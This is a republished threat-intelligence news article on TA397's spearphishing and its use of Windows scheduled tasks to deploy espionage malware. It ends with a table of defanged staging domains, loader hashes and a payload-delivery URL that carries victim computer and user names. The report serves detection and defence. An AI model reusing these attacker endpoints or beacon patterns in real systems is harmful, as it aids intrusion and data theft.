By rssfeeds-admin 
Technical analysis reveals that TA397 frequently leverages Windows Scheduled Tasks (SCHTASKS) as a core delivery mechanism for establishing persistence and deploying multi-stage malware payloads on targeted victim systems.
Technical Overview
From October 2024 through April 2025, Proofpoint Threat Research observed numerous campaigns attributed to TA397 targeting governmental, diplomatic, and defense entities primarily in Europe, with spillover into China, Pakistan, and other countries significant to Indian strategic interests.
TA397 continuously refines its delivery methods, often exploiting spearphishing emails with malicious attachments or URLs.
These lure documents are highly localized and often spoof diplomatic or governmental correspondence, leveraging topical subject lines relating to foreign policy, defense contracts, and bilateral agreements.
Initial access is nearly always achieved via spearphishing, where recipients receive either a direct malicious attachment or a link to a file hosted on a legitimate service.
Execution typically results in the creation of a scheduled task, often using PowerShell, cmd.exe, or curl, which beacons at fixed intervals (commonly 16–19 minutes) to attacker-controlled staging domains.
The beacon payload almost invariably contains unique host identifiers such as the victim’s computer name and username embedded in the outbound HTTP(S) request, often to PHP scripts on the C2 server.
This approach allows manual triage and filtering by the adversary prior to delivering follow-up payloads.
TA397 displays operational adaptability, abusing various file types (e.g., MSC, LNK, CHM, IQY) for initial payload execution and leveraging recently disclosed vulnerabilities (such as CVE-2024-43572 “GrimResource” for MSC files) to broaden its infection vectors.
Despite this variety, the creation and management of scheduled tasks remain consistent hallmarks of its tradecraft.
Hands-On-Keyboard Activity
Once persistence is established, TA397 operators frequently perform manual, hands-on-keyboard operations within hours of initial compromise almost exclusively aligning with Indian Standard Time (IST) business hours.
Analysis of command execution reveals staged system reconnaissance, anti-virus detection, and selective deployment of second-stage payloads such as custom RATs (including wmRAT, MiyaRAT, KugelBlitz, Demon agent, and BDarkRAT).
Payload delivery is highly targeted: only after successful host profiling and victim validation do operators push tailored malware suited to espionage objectives.
Infrastructure analysis shows a pattern of hosting C2 and staging domains with Let’s Encrypt certificates and distinctive PHP URI structures.
Domain registrations and certificate issuances largely occur during IST business hours, further reinforcing the attribution to an Indian nexus.
TA397’s activities demonstrate substantial overlap with other known Indian APTs, indicating tool-sharing within a broader ecosystem of state-sponsored operations.
The group’s masquerading as foreign government entities and use of authentic-seeming decoy documents underline a deep familiarity with international diplomatic protocols and ongoing geopolitical events.
Exfiltrated documents ranging from tax records to military plans underscore the strategic intent behind TA397’s operations.
Detection opportunities abound in monitoring for scheduled task creations with characteristic command lines, beaconing patterns including computer and username data, and the use of Let’s Encrypt certificates for attacker infrastructure.
Indicators of Compromise (IOC)
| Indicator (Type) | Description | First Seen |
|---|---|---|
| mnemautoregsvc[.]com (Domain) | Staging domain | Oct 2024 |
| jacknwoods[.]com (Domain) | Staging domain | Nov 2024 |
| 1b67fc55fd050d011d6712ac17315112767cac8bbe059967b70147610933b6c1 | LNK scheduled task loader (SHA256) | Dec 2024 |
| 7c5dde52845ecae6c80c70af2200d34ef0e1bc6cbf3ead1197695b91acd22a67 | CHM scheduled task loader (SHA256) | Dec 2024 |
| hxxp://46[.]229[.]55[.]63/svch.php?li=%computername%[.][.]%username% | Payload delivery URL | Dec 2024 |
| utizviewstation[.]com (Domain) | Staging domain | Feb 2025 |
| blucollinsoutien[.]com (Domain) | Staging domain | Mar 2025 |
| princecleanit[.]com (Domain) | Staging domain | Mar 2025 |
| woodstocktutors[.]com (Domain) | Staging domain | Apr 2025 |
| warsanservices[.]com (Domain) | Staging domain | Apr 2025 |
| c9612051b3956ac8722d8be7994634b7c940be07ca26e2fc8d0d5c94db2e4682 | CHM scheduled task loader (SHA256) | May 2025 |
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Update
The post TA397 Hackers Use Scheduled Tasks to Deploy Malware on Victim Machines appeared first on Cyber Security News.
Discover more from RSS Feeds Cloud
Subscribe to get the latest posts sent to your email.